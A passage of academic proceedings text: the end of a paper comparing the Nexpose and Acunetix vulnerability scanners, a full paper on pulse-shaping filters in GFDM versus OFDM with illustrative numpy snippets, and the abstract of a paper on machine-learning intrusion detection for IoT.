We could generate a full report on all the vulnerabilities found, with proposed solutions to fix them and with other layers or aspects to secure in our web application. After using Nexpose and Acunetix in this implementation, we are able to make a general comparison of the features that both offer, based on the scans we performed and on various enterprise reviews. In the next tables, we compare four essential components covering network and application features (Fig. 4). According to this feature comparison, Acunetix relies on its unique AcuSensor technology to detect more security vulnerabilities than other web application scanners while generating fewer false positives; AcuSensor accurately locates vulnerabilities in the code and reports additional debugging information. Nexpose, on the other hand, offers good performance across different layers and targets without such detection add-ons, as listed in the integration and improvement section. In conclusion of this benchmarking, we cannot say that Nexpose is better


Fig. 4. Application for vulnerability scanner software comparison.

Fig. 5. Network for vulnerability scanner software comparison.


than Acunetix, or vice versa, but we can evaluate the performance of Nexpose relative to Acunetix (Fig. 5). Regarding vulnerabilities, a proper implementation of input validation helps to avoid most web application vulnerabilities. On the other hand, handling every input in isolation to guard against unexpected command-line arguments, user-controlled files, and other suspicious input can be a complicated task, and as a result the validation is sometimes omitted. Warnings and error messages point both developers and attackers to the locations of possible security flaws. Static and dynamic analysis tools can find and eliminate vulnerabilities [19,20].
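As a small, hedged illustration of the whitelist-style input validation mentioned above (the field name and the pattern are hypothetical and not taken from the paper):

import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")   # whitelist: letters, digits, underscore only

def validate_username(value: str) -> str:
    # Reject anything outside the whitelist instead of trying to strip "bad" characters.
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid username")
    return value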

5 Conclusion

Many vulnerabilities appear every day, and many tools are released to help identify them. Users need to understand common vulnerabilities and how to use such tools to detect threats and attacks and protect themselves from them. In this article, we briefly described three well-known, highly ranked web application vulnerabilities; we described in detail how these vulnerabilities happen and how severely they can affect a normal user of a web application, either through the loss of sensitive data or through the loss of control over their website. We also presented two important tools that pentesters use to discover vulnerabilities in web applications. At the end of this paper, we carried out an implementation that allowed us to make a concrete comparison between Nexpose and Acunetix by scanning the same target, DVWA, for vulnerabilities. In this way, the wide range of available systems, called penetration testing platforms, could be better used and applied, and the new systems that will be developed could be better designed, adopting specific and more optimized processes or a comprehensive approach that fulfills all predefined requirements for the detection of vulnerabilities. Therefore, in future work we will focus on uncovering those three vulnerabilities using the advantages that AI has brought, especially the detection of vulnerabilities based on machine learning.

References

1. Alzahrani, A., Alqazzaz, A., Fu, H., Almashf, N.: Web application security tools analysis. IEEE (2017)
2. Priyanka, A.K., Smruthi, S.S., Siddhartha, V.R., Engineering College India: Web application vulnerabilities: exploitation and prevention. IEEE (2020)
3. Nirmal, K., Janet, B., Kumar, R.: Web application vulnerabilities - the hacker's treasure. In: Proceedings of the International Conference on Inventive Research in Computing Applications (ICIRCA) (2018). ISBN: 978-1-5386-2456-2
4. Huang, H.C., Zhang, Z.K., Cheng, H.W., Shieh, S.W.: Web application security: threats, countermeasures, and pitfalls. IEEE (2017)
5. Moore, M.: Penetration testing and metasploit (2017)
6. Wang, Y., Yang, J.: Ethical hacking and network defense: choose your best network vulnerability scanning tool. In: Proceedings of the 31st International Conference on Advanced Information Networking and Applications Workshops (2017)
7. Gupta, M.K., Govil, M.C., Singh, G.: Predicting cross-site scripting (XSS) security vulnerabilities in web applications. In: Proceedings of the 12th International Joint Conference on Computer Science and Software Engineering (JCSSE) (2015)
8. D'silva, K., Vanajakshi, J., Manjunath, K.N., Prabhu, S.: An effective method for preventing SQL injection attack and session hijacking. In: Proceedings of the 2017 2nd IEEE International Conference on Recent Trends in Electronics Information and Communication Technology (RTEICT), India, 19-20 May 2017
9. Ping, C.: A second-order SQL injection detection method. IEEE (2017)
10. Parimala, G., Sangeetha, M., AndalPriyadharsini, R.: Efficient web vulnerability detection tool for sleeping giant - cross site request forgery. In: Proceedings of the 2018 National Conference on Mathematical Techniques and Its Applications (NCMTA) (2018)
11. Nagpure, S., Kurkure, S.: Vulnerability assessment and penetration testing of web application. In: Proceedings of the 2017 Third International Conference on Computing, Communication, Control and Automation (ICCUBEA) (2017)
12. Sagar, D., Kukreja, S., Brahma, J., Tyagi, S., Jain, P.: Studying open source vulnerability scanners for vulnerabilities in web applications. IIOAB J. (2018). iioab.org
13. Holik, F., Neradova, S.: Vulnerabilities of modern web applications. In: MIPRO 2017, Opatija, Croatia, 22-26 May 2017
14. Hasan, A.M., Divyakant, T., Meva, A.K., Roy, J.D.: Perusal of web application security approach. In: International Conference on Intelligent Communication and Computational Techniques (ICCT), Manipal University Jaipur, 22-23 December 2017
15. Utaya Surian, R., Rahman, N.A.A., Nathan, Y.: Scanner: vulnerabilities detection tool for web application. J. Phys. Conf. Ser. (2020)
16. Nexpose: Administration guide, product version 6.4. https://www.rapid7.com/products/nexpose/. Accessed 02 Mar 2022
17. Sectools.org: Top 125 network security tools (2015). http://sectools.org/. Accessed Jan 2015
18. Goela, J.N., Mehtreb, B.M.: Vulnerability assessment & penetration testing as a cyber defence technology. In: Proceedings of the 3rd International Conference on Recent Trends in Computing (ICRTC 2015) (2015)
19. Joshi, C., Singh, U.K.: Analysis of vulnerability scanners in quest of current information security landscape. Int. J. Comput. Appl. (IJCA) 146(2), 1-7 (2016). ISSN 0975-8887
20. Joshi, C., Singh, U.K.: Performance evaluation of web application security scanners for more effective defense. Int. J. Sci. Res. Publ. (IJSRP) 6(6), 660-667 (2016). ISSN 2250-3153

The Pulse-Shaping Filter Influence over the GFDM-Based System

Karima Ait Bouslam1(B), Jamal Amadid1, Radouane Iqdour1,2, and Abdelouhab Zeroual1

1 I2SP Group, Faculty of Sciences Semlalia, Cadi Ayyad University, Marrakesh, Morocco
[email protected], [email protected], [email protected]
2 CRMEF, Marrakesh Safi, Morocco

Abstract. Generalized frequency division multiplexing (GFDM) is a generalization of orthogonal frequency division multiplexing (OFDM) and is considered a candidate for next-generation wireless communication systems, thanks to several advantages such as an adequate and suitable construction based on circular convolution and a sub-symbol structure, low peak-to-average power ratio (PAPR), low out-of-band (OOB) emission, low latency, relaxed time and frequency synchronization requirements, and high data rate. Due to its spectrum efficiency, GFDM is an excellent multi-carrier modulation for a wide range of cognitive radio (CR) systems (for example, machine-to-machine communication using CR techniques, the Internet of Things (IoT), satellite, military, and so on). The main component that drives the performance of a GFDM system is the prototype filter design. The present work aims to test, on the one hand, the influence of the pulse-shaping filter on the performance of the GFDM system in terms of spectral efficiency and OOB emission for different values of the roll-off factor, and on the other hand the impact of the number of sub-carriers on the GFDM spectrum. The simulation results show that GFDM allows considerable OOB reduction and improved spectral efficiency compared to OFDM modulation.

Keywords: 5G Wireless Communication Systems · Spectrum Efficiency · Roll-Off Factor · Out-Of-Band · Orthogonal Frequency Division Multiplexing · Generalized Frequency Division Multiplexing

1 Introduction

In wireless communication systems, several technologies have been proposed (i.e., machine-to-machine communication using cognitive radio (CR) approaches, the Internet of Things, satellite, military, etc.). These technologies require systems that provide high data rates, low latency, and massive device connectivity [1,2], as well as a considerable increase in data volume and high spectral efficiency. To respond to these requirements, multi-carrier modulation has been adopted: the well-known multi-carrier modulation orthogonal frequency-division multiplexing (OFDM) was proposed for 4G wireless networks. The OFDM technology involves dividing a high data-rate stream into a number of lower-rate streams [3,4], which are then transmitted synchronously on a number of orthogonal sub-carriers. Consequently, robustness against multipath fading, resistance to frequency-selective fading, and high data rate are the major benefits of OFDM systems [5]. However, a large peak-to-average power ratio (PAPR), out-of-band (OOB) emission, and a small spectral efficiency gain (due to the cyclic prefix (CP) that must be added to each OFDM symbol) are the main drawbacks of OFDM modulation. Therefore, to overcome these drawbacks and move beyond 4G networks (i.e., toward 5G wireless communication), generalized frequency division multiplexing (GFDM) has been proposed for 5G wireless communication systems [6]. Using an adequate construction based on circular convolution filtering and a sub-symbol structure [7], the GFDM system can achieve a high data rate, low OOB radiation, and improved spectrum utilization (i.e., high spectral efficiency). Additionally, GFDM is an effective multi-carrier modulation for a wide variety of CR systems due to its spectrum efficiency [8]. In the literature, numerous works have focused on the influence of pulse-shaping filters on GFDM using several metrics such as the Bit Error Rate (BER) and the Symbol Error Rate (SER) [9]. In [10], the authors investigate the effect of enhanced Nyquist pulse-shaping filters on the GFDM symbol error rate (SER). In [11], an optimal filter design for GFDM under the criteria of rate maximization and OOB emission minimization is considered. The goal of this paper is to investigate the impact of the pulse-shaping filter on the performance of GFDM systems, especially the spectrum efficiency and the OOB emission. The remainder of this paper is organized as follows. In Sect. 2, we present the OFDM-based system. In Sect. 3, we introduce the system model of GFDM. Section 4 presents the simulation results and discussion. Finally, Sect. 5 concludes the paper.

2 System Model-Based OFDM

In this section, we examine an OFDM system that splits a high data-rate stream into N low data-rate streams, which are transmitted on N sub-carriers. Each of them is modulated by quadrature amplitude modulation (QAM), and the data symbols d_k, 0 ≤ k ≤ N − 1, are modulated by applying an IFFT. The baseband OFDM signal is the collection of all d_k symbols [12]

s_m = \sum_{k=0}^{N-1} d_k \, e^{j 2\pi f_k m T_e}    (1)

f_k = k\,\Delta f + f_0, \quad k = 0, 1, 2, \dots, N-1    (2)

where \Delta f denotes the spacing between adjacent carriers, 0 ≤ t ≤ T_s, T_s is the duration of each symbol, and f_k is the frequency of each sub-carrier. Thus, in order to avoid interference between the sub-carriers, the orthogonality condition must be verified [13]

\Delta f \cdot T_s = 1    (3)

The s_m are thus obtained by an inverse discrete Fourier transform of the d_k symbols. Moreover, we consider a channel without noise. Therefore, the received signal can be expressed as

y(t) = \sum_{k=0}^{N-1} d_k \, H_k(t) \, e^{j 2\pi (f_0 + \frac{k}{T}) t}    (4)

where H_k(t) is the transfer function of the channel around frequency f_k at time t. This function varies slowly and can be assumed constant over the period T.

y_n = y\left(\frac{nT}{N}\right) = \sum_{k=0}^{N-1} d_k h_k \, e^{j 2\pi f_k \frac{n}{N}} = \sqrt{N}\,\mathrm{DFT}^{-1}(d_k h_k)    (5)

where h_k is the complex response of the channel at frequency f_k.
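As a hedged numerical illustration of Eq. (1) (not part of the paper), the OFDM baseband symbol is simply an inverse DFT of the QAM symbols d_k; the sketch below assumes f_0 = 0 and T_e = T_s/N so that f_k m T_e = km/N, and the value of N is arbitrary.

import numpy as np

N = 64                                                            # illustrative number of sub-carriers
qam = np.array([1 + 1j, 1 - 1j, -1 + 1j, -1 - 1j]) / np.sqrt(2)   # 4-QAM alphabet
d = qam[np.random.randint(0, 4, N)]                               # one QAM symbol per sub-carrier

# Eq. (1): s_m = sum_k d_k exp(j 2*pi*k*m/N), i.e. an (unnormalized) inverse DFT of the d_k.
s = np.fft.ifft(d) * N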

3 System Model-Based GFDM

Consider a wireless communication system that transmits data in a block structure composed of K sub-carriers and M sub-symbols. Moreover, let N = K × M be the total number of data symbols in the block. The transmitted block is expressed as follows [14]

\vec{d} = (d_{0,0}, \dots, d_{K-1,0}, d_{0,1}, \dots, d_{K-1,1}, \dots, d_{0,M-1}, \dots, d_{K-1,M-1})    (6)

where d_{k,m} represents the symbol transmitted on the k-th sub-carrier and the m-th sub-symbol of the block. Organizing the data symbols into a two-dimensional structure, where the rows and columns correspond to the frequency and time resources, respectively, gives the following (K × M) data matrix

D = \begin{pmatrix} d_{0,0} & \cdots & d_{0,M-1} \\ \vdots & \ddots & \vdots \\ d_{K-1,0} & \cdots & d_{K-1,M-1} \end{pmatrix}    (7)

3.1 GFDM Transmitter

The block diagram of the GFDM transmitter is shown in Fig. 1.

Fig. 1. Block diagram of the GFDM transmitter

In the first step, data from a binary source are arranged in K sub-carriers, each transmitting M sub-symbols. The binary data are mapped with quadrature amplitude modulation, then the data of each sub-carrier are up-sampled as reported in [15]:

d_k^N[n] = \sum_{m=0}^{M-1} d_{k,m}\, \delta[n - mN], \quad n = 0, \dots, NM-1    (8)

These d_k^N sequences are filtered with a transmission filter

g_{k,m}[n] = g[(n - mk) \bmod N] \cdot \exp\left(j 2\pi \frac{k}{K} n\right)    (9)

where g[n] denotes the impulse response of a prototype filter with N samples, while k, m, and n are the sub-carrier, sub-symbol, and sample indexes, respectively. We note that the modulo operation combined with the prototype filter effectively produces a circular convolution of the over-sampled data symbols, called tail biting, as reported in [16,17]. Moreover, the length of the sequence after the filtering process is N samples. The transmit signal on each sub-carrier is given by

x_k[n] = (d_k^N \circledast g)[n] \cdot W^{kn}    (10)

where \circledast denotes circular convolution and W^{kn} is expressed as

W^{kn} = e^{j 2\pi k n / K}    (11)

Circular convolution is used to modulate the transmit filters with the data symbols [18], which means that the GFDM block is self-contained in N samples, and the transmit signal of a data block is then obtained as the sum of all the sub-carrier signals

x[n] = \sum_{k=0}^{K-1} x_k[n]    (12)

Hence

x[n] = \sum_{k=0}^{K-1} \sum_{m=0}^{M-1} d_{k,m}\, \delta[(n - mN) \bmod N] \circledast g[n]\, e^{j \frac{2\pi k n}{K}}    (13)

Finally, the baseband transmit signal is obtained as the sum of all sub-carrier and sub-symbol signals according to the following expression [16]:

x[n] = \sum_{k=0}^{K-1} \sum_{m=0}^{M-1} d_{k,m}\, g_{k,m}[n]    (14)

Only one cyclic prefix (CP) is added to the whole set of GFDM symbols [18], which leads to the transmit signal x̃[n] that is subsequently sent over the radio channel. In order to reduce the interference between the M symbols of the frame (Inter-Frame Interference), the CP duration must be equal to [19]

T_{cp} = T_g + T_h + T_g    (15)

where T_g is the duration of the filter and T_h is the length of the impulse response of the channel h[n]. It is important to note that this duration must remain small in order to avoid overlapping the GFDM symbol.
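As a hedged illustration (not the authors' code), the circular-convolution ("tail biting") modulator described above can be sketched in a few lines of numpy. The sketch uses the convention common in the GFDM literature of placing one data symbol every K samples of a block of N = KM samples, which differs slightly from the up-sampling convention of Eq. (8); the prototype filter g is assumed to be given with N samples.

import numpy as np

def gfdm_modulate(D, g):
    # D: K x M matrix of QAM symbols (rows: sub-carriers, columns: sub-symbols)
    # g: prototype filter impulse response with N = K*M samples
    K, M = D.shape
    N = K * M
    n = np.arange(N)
    x = np.zeros(N, dtype=complex)
    for k in range(K):
        d_up = np.zeros(N, dtype=complex)
        d_up[::K] = D[k, :]                                   # one data symbol every K samples
        # circular convolution with the prototype filter ("tail biting")
        filtered = np.fft.ifft(np.fft.fft(d_up) * np.fft.fft(g))
        x += filtered * np.exp(2j * np.pi * k * n / K)        # shift to sub-carrier k
    return x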

3.2 GFDM Receiver

The baseband samples received by the receiver (shown in Fig. 2) are given by the following expression [20]

\tilde{y}[n] = h[n] * \tilde{x}[n] + \tilde{v}[n]    (16)

where h[n] is the channel impulse response, \tilde{v}[n] is an Additive White Gaussian Noise (AWGN) vector, and * represents the convolution product.

Fig. 2. The GFDM receiver model

Moreover, we assume perfect knowledge of the channel impulse response and perfect time and frequency synchronization at the receiver. In addition, the cyclic extension can be removed, as it makes the convolution with the channel circular; therefore, the equalized received signal can be written as

z = \mathrm{IDFT}\left( \frac{\mathrm{DFT}(y[n])}{\mathrm{DFT}(h[n])} \right)    (17)

Note that DFT and IDFT represent the fast Fourier transform and the inverse Fourier transform. After GFDM demodulation, a reception filter such as the matched filter, zero forcing, or minimum mean square error filter is applied [21]. Consequently, the performance of GFDM receivers depends on the prototype filter, designed to minimize losses; the GFDM prototype filter must also meet other requirements, such as low OOB emission.
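As an aside, the frequency-domain zero-forcing step of Eq. (17) can be written in a few lines of numpy; this sketch is illustrative only and assumes the cyclic prefix has already been removed.

import numpy as np

def zf_equalize(y, h, n_fft):
    # y: received block (CP removed), h: channel impulse response, n_fft: block length N
    H = np.fft.fft(h, n_fft)              # channel frequency response
    Y = np.fft.fft(y, n_fft)
    return np.fft.ifft(Y / H)             # z = IDFT( DFT(y) / DFT(h) ), Eq. (17)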

Next, we define the pulse-shaping filters used throughout this work.

3.3 Rectangular Filter

The rectangular filter, also known as a window filter, is defined as

h(t) = \begin{cases} 1 & \text{if } t \in [T_1, T_2] \\ 0 & \text{otherwise} \end{cases}    (18)

3.4 Raised Cosine (RC)

Note that data transmission over band-limited channels requires pulse shaping to eliminate or control inter-symbol interference (ISI) [22]. In this context, we introduce the RC filter, as it allows the pulse shape to be controlled through the roll-off factor α, which takes values between 0 and 1. The expression of this filter is written as

g_{RC}(t) = \begin{cases} \frac{\pi}{4}\,\mathrm{sinc}\left(\frac{1}{2\alpha}\right) & \text{if } t = \pm\frac{T}{2\alpha} \\ \mathrm{sinc}\left(\frac{t}{T}\right) \frac{\cos\left(\frac{\pi \alpha t}{T}\right)}{1 - \left(\frac{2\alpha t}{T}\right)^2} & \text{otherwise} \end{cases}    (19)

3.5 Root Raised Cosine (RRC)

The RRC (root raised cosine) filter is used as a pulse-shaping filter at the transmitter and as a matched filter at the receiver [23]. It minimizes the inter-symbol interference (ISI) between message symbols because the cascade of the two filters satisfies the Nyquist criterion [24]. Its impulse response is defined by

g_{RRC}(t) = \frac{4\alpha}{\pi} \cdot \frac{\cos\left(\pi (1+\alpha)\frac{t}{T}\right) + \frac{\sin\left(\pi (1-\alpha)\frac{t}{T}\right)}{4\alpha \frac{t}{T}}}{1 - \left(4\alpha \frac{t}{T}\right)^2}    (20)

where T is the symbol period.
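As a hedged numerical companion to Eq. (19) (not part of the paper), the raised-cosine pulse can be evaluated in numpy as follows, taking care of the limiting value at t = ±T/(2α):

import numpy as np

def raised_cosine(t, T=1.0, alpha=0.5):
    # g_RC(t) = sinc(t/T) * cos(pi*alpha*t/T) / (1 - (2*alpha*t/T)^2), with the
    # limiting value (pi/4) * sinc(1/(2*alpha)) at t = +/- T/(2*alpha).
    t = np.asarray(t, dtype=float)
    denom = 1.0 - (2.0 * alpha * t / T) ** 2
    singular = np.isclose(denom, 0.0)
    safe_denom = np.where(singular, 1.0, denom)      # avoid division by zero at the singular points
    g = np.sinc(t / T) * np.cos(np.pi * alpha * t / T) / safe_denom
    return np.where(singular, (np.pi / 4.0) * np.sinc(1.0 / (2.0 * alpha)), g)

# Example: filter taps over +/- 4 symbol periods with roll-off 0.9
taps = raised_cosine(np.linspace(-4.0, 4.0, 129), T=1.0, alpha=0.9)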

4 Numerical Results

In this section, we test the influence of the pulse-shaping filter (rectangular, RC, and RRC) on the performance of GFDM, in comparison with OFDM, in terms of spectrum efficiency and OOB emission for different values of the roll-off factor. We use the power spectral density (PSD) as the measurement. The simulation was done in MATLAB, and the parameters used throughout this work are listed in Tables 1 and 2 below. In the first part of the simulation, we compare the PSD of the GFDM and OFDM modulations by applying, in the time domain, the three filters, namely the rectangular, RC, and RRC filters; in the case of the RC and RRC filters, the roll-off factor is varied over three values (0.1, 0.5, 0.9). In the second part, we examine the influence of the number of sub-carriers on the spectrum efficiency.

Table 1. GFDM simulation parameters

Number of total sub-carriers                512
Number of active sub-carriers               14
Number of active sub-carriers               201
Modulation used                             QAM
Number of samples per cyclic prefix (CP)    0
Number of sub-symbols                       15

Table 2. OFDM simulation parameters

Number of total sub-carriers                512
Number of active sub-carriers               14
Number of active sub-carriers               201
Modulation used                             QAM
Number of samples per cyclic prefix (CP)    0
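The PSD curves discussed below were produced in MATLAB; as a hedged, equivalent illustration only, a Welch estimate of the PSD of a complex baseband block x (for instance the GFDM signal sketched in Sect. 3.1) can be obtained in Python as follows:

import numpy as np
from scipy.signal import welch

def psd_db(x, fs=1.0):
    # Welch estimate of the two-sided PSD of a complex baseband signal, in dB
    f, pxx = welch(x, fs=fs, nperseg=min(1024, len(x)), return_onesided=False)
    order = np.argsort(f)                 # reorder so negative frequencies come first for plotting
    return f[order], 10.0 * np.log10(pxx[order])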

4.1 The Impact of the Designed Pulse-Shaping Filter

In Fig. 3, we plot the PSD [dB] versus the frequency range; we can see that the use of a rectangular filter allows only a small decrease in OOB emission for both techniques. Despite its simplicity, the rectangular filter has practically no effect on the reduction of the OOB, and this result shows the importance of the filter for the spectrum efficiency. In Figs. 4, 5 and 6, we plot the PSD [dB] versus the frequency range, where the effect of the RC filter on the OOB is evaluated using an RC filter in the time domain. With a roll-off factor α = 0.1, there is a reduction in OOB of up to −25 dB for GFDM and a gap of about 32.2 dB compared to OFDM. Increasing the roll-off factor to α = 0.5, we observe a further reduction in OOB for GFDM compared to OFDM, with a gap of about 48.623 dB. Finally, selecting a roll-off factor of α = 0.9, we observe a reduction of 40 dB, while the OFDM spectrum remains almost unchanged. From these results, we can conclude that the spectrum efficiency depends on two factors: the first is the choice of the shaping filter, and the second is the roll-off factor; the RC filter is thus a good choice, since it favors the reduction of the spectrum ripples for different values of the roll-off factor α. In Figs. 7, 8 and 9, we plot the PSD [dB] versus the frequency range. We notice that the use of an RRC filter decreases the OOB power: for α = 0.1 the difference between the OFDM and GFDM signals is 22.72 dB, for α = 0.5 the gap increases to 24.899 dB, and for α = 0.9 the gap equals 31.425 dB. It can be seen that the use of the RRC filter largely reduces the out-of-band ripples, which improves the spectral efficiency.


Fig. 3. The effect of the rectangular filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques

Fig. 4. The effect of the RC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.1)


Fig. 5. The effect of the RC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.5)

Fig. 6. The effect of the RC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.9)


Fig. 7. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.1)

Fig. 8. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.5)


Fig. 9. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.9)

We can conclude that the choice of the prototype filter used for pulse shaping is a very important criterion for improving the spectrum efficiency. Moreover, the value of the roll-off factor α is also a determining factor, since for a high value of this factor the filter becomes wider in the time domain and narrower and more selective in the spectral domain, which minimizes the side-lobe ripples. Consequently, the spectral efficiency problem in 5G networks can be addressed. These results confirm that GFDM modulation is more efficient than OFDM in all the studied scenarios.

4.2 Influence of the Number of Sub-carriers

In this part, we study the effect of the number of active sub-carriers on the PSD spectrum. Note that in this part we use an RC filter with a roll-off factor equal to 0.9, in order to compare the spectrum efficiency of OFDM and GFDM and to observe the impact of the number of samples used. In Fig. 10, we plot the PSD [dB] versus frequency; we can see that the out-of-band emission decreases to −32 dB for 401 samples. On the other hand, in Fig. 11, we plot the PSD [dB] versus frequency; the OOB decreases to −40 dB for 201 samples, and the difference between GFDM and OFDM is about 30 dB. From these results we can see that the more the number of sub-carriers increases, the more the OOB increases, because the OFDM symbol is affected by the ICI between the sub-carriers and the ISI between the sub-symbols, which leads to an increase in the out-of-band ripple. From these results, we can note that the use of GFDM modulation can considerably reduce the OOB emission in comparison with OFDM


Fig. 10. The PSD versus frequency spectrum with a number of sub-carriers equal to 401

Fig. 11. The PSD versus frequency spectrum with a number of sub-carriers equal to 201


modulation, resulting in an improved spectral efficiency which makes it a promising candidate for 5G wireless networks.

5 Conclusion

In this paper, we examined the influence of the pulse-shaping filter on the performance of the GFDM system, notably the spectrum efficiency and the OOB emission, for different values of the roll-off factor. A comparison with OFDM modulation was performed. The simulation results show that the RC pulse-shaping filter gives the best performance in the GFDM spectrum for a large value of the roll-off factor; in addition, it achieves more OOB reduction than the rectangular and RRC filters. The influence of the number of sub-carriers on the GFDM spectrum was also tested.

References

1. Liu, G., Jiang, D.: 5G: vision and requirements for mobile communication system towards year 2020. Chinese J. Eng. 2016(2016), 8 (2016)
2. Ateya, A.A., Muthanna, A., Makolkina, M., Koucheryavy, A.: Study of 5G services standardization: specifications and requirements. In: 2018 10th International Congress on Ultra Modern Telecommunications and Control Systems and Workshops (ICUMT), pp. 1-6. IEEE (2018)
3. Hamamreh, J.M., Hajar, A., Abewa, M.: Orthogonal frequency division multiplexing with subcarrier power modulation for doubling the spectral efficiency of 6G and beyond networks. Trans. Emerg. Telecommun. Technol. 31(4), e3921 (2020)
4. Hazareena, A., Aziz Mustafa, B.: A survey: on the waveforms for 5G. In: 2018 Second International Conference on Electronics, Communication and Aerospace Technology (ICECA), pp. 64-67. IEEE (2018)
5. Shawqi, F.S., et al.: An overview of OFDM-UWB 60 GHz system in high order modulation schemes. In: 2020 4th International Symposium on Multidisciplinary Studies and Innovative Technologies (ISMSIT), pp. 1-6. IEEE (2020)
6. Fettweis, G., Krondorf, M., Bittner, S.: GFDM - generalized frequency division multiplexing. In: VTC Spring 2009 - IEEE 69th Vehicular Technology Conference, pp. 1-4. IEEE (2009)
7. Michailow, N., Gaspar, I., Krone, S., Lentmaier, M., Fettweis, G.: Generalized frequency division multiplexing: analysis of an alternative multi-carrier technique for next generation cellular systems. In: 2012 International Symposium on Wireless Communication Systems (ISWCS), pp. 171-175. IEEE (2012)
8. Mestoui, J., El Ghzaoui, M.: Theoretical analysis and performance comparison of multi-carrier waveforms for 5G wireless applications. Int. J. Integr. Eng. 13(6), 202-219 (2021)
9. Han, S., Sung, Y., Lee, Y.H.: Filter design for generalized frequency-division multiplexing. IEEE Trans. Sig. Process. 65(7), 1644-1659 (2016)
10. Tai, C.-L., Su, B., Chen, P.-C.: Optimal filter design for GFDM that minimizes PAPR under performance constraints. In: 2018 IEEE Wireless Communications and Networking Conference (WCNC), pp. 1-6 (2018)
11. Chen, P.-C., Su, B.: Filter optimization of out-of-band radiation with performance constraints for GFDM systems. In: 2017 IEEE 18th International Workshop on Signal Processing Advances in Wireless Communications (SPAWC), pp. 1-5 (2017)
12. Van Nee, R.D.J., Prasad, R.: OFDM for wireless multimedia communications (2000)
13. Zhou, Y., Jiang, T.: Active point modification for sidelobe suppression with PAPR constraint in OFDM systems. Wireless Netw. 19(7), 1653-1663 (2013)
14. Na, Z., Lv, J., Zhang, M., Peng, B., Xiong, M., Guan, M.: GFDM based wireless powered communication for cooperative relay system. IEEE Access 7, 50971-50979 (2019)
15. Matthé, M., Mendes, L., Gaspar, I., Michailow, N., Zhang, D., Fettweis, G.: Precoded GFDM transceiver with low complexity time domain processing. EURASIP J. Wirel. Commun. Networking 2016(1), 138 (2016)
16. Gaspar, I., Mendes, L., Michailow, N., Fettweis, G.: A synchronization technique for generalized frequency division multiplexing. EURASIP J. Adv. Sig. Process. 2014, 67 (2014)
17. Kumar, A., Magarini, M.: Improved Nyquist pulse shaping filters for generalized frequency division multiplexing, November 2016
18. Yamini, A., Nevatha, J., Kannan, S., Raju, S.: GFDM-based device to device systems in 5G cellular networks, pp. 653-660, May 2021
19. Tiwari, S., Das, S.S., Bandyopadhyay, K.K.: Precoded GFDM system to combat inter carrier interference: performance analysis. arXiv, abs/1506.03744 (2015)
20. Dias, W.D., Mendes, L.L., Rodrigues, J.J.P.C.: Low complexity GFDM receiver for frequency-selective channels. IEEE Commun. Lett. 23(7), 1166-1169 (2019)
21. Farhang, A., Marchetti, N., Doyle, L.E.: Low-complexity modem design for GFDM. IEEE Trans. Sig. Process. 64(6), 1507-1518 (2016)
22. Alexandru, N.D., Balan, A.L.: A generalization of raised cosine pulses. In: 2016 International Conference on Development and Application Systems (DAS), pp. 139-142, Suceava, Romania. IEEE, May 2016
23. Huang, X., Saniie, J., Bakhtiari, S., Heifetz, A.: Pulse shaping and matched filters for EMAT communication system. In: 2019 IEEE International Conference on Electro Information Technology (EIT), pp. 1-4, May 2019
24. Daumont, S., Rihawi, B., Louët, Y.: Root raised cosine filter influences on PAPR distribution of single carrier signals, March 2008

Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study

Hdidou Rachid(B), El Alami Mohamed, and Drissi Ahmed

ERMIA Team, Department of Mathematics and Computer Science, National School of Applied Sciences Tangier, Abdelmalek Essaadi University, Tétouan, Morocco
[email protected], {m.elalamihassoun, a.drissi}@uae.ac.ma

Abstract. The Internet of Things, or IoT, refers to the ability of objects to communicate with one another via the Internet; these objects can transfer data using many types of sensors and mobile or web applications without the need for human intervention. This technology is becoming more important in several fields, such as transport and logistics, to monitor the temperature of the warehouses storing the materials to be transported or to monitor the condition of the vehicles themselves; the health field, to monitor, using sensors, the state of patients with certain diseases such as heart disease; and the field of general security, to raise alerts for water, electricity, and gas problems at home or in factories, or for forest fire hazards, using sensors and web or mobile applications. With the increased use of this technology in our daily lives, the security of Internet of Things applications and of the data exchanged in Internet of Things networks has become a necessity. Cybersecurity researchers are trying to offer solutions adapted to Internet of Things networks. Several solution paths have been proposed in recent years, including solutions based on cryptography to secure communication and data exchange, solutions based on Blockchain for the security of communication between devices in Internet of Things networks, and solutions based on Intrusion Detection Systems as well. Intrusion Detection Systems are one of the techniques most discussed by researchers for implementing security solutions for the Internet of Things, especially IDSs based on artificial intelligence techniques such as Machine Learning. This paper presents a comparison between five Machine Learning algorithms (Support Vector Machine, J48, Random Forest, Decision Table, and Naive Bayes) in the context of intrusion detection. In this comparison, we used the NSL-KDD dataset (Network Security Laboratory - Knowledge Discovery in Databases). The main objective behind this comparison is to identify the most efficient Machine Learning algorithms for intrusion detection, to be used as the main building blocks of future Intrusion Detection System modules. The results obtained show that Random Forest, J48, and Decision Table are the most efficient algorithms in terms of Accuracy (respectively 99.92%, 99.72%, and 99.49%), Detection Rate (respectively 99.90%, 99.77%, and 99.29%), and False Alarm Rate (respectively 0.05%, 0.34%, and 0.27%). Therefore, these three algorithms can be considered a good basis for future intrusion detection system solutions to increase the security of the Internet of Things.


Keywords: Intrusion Detection System · Internet of Things · Machine Learning

1 Introduction

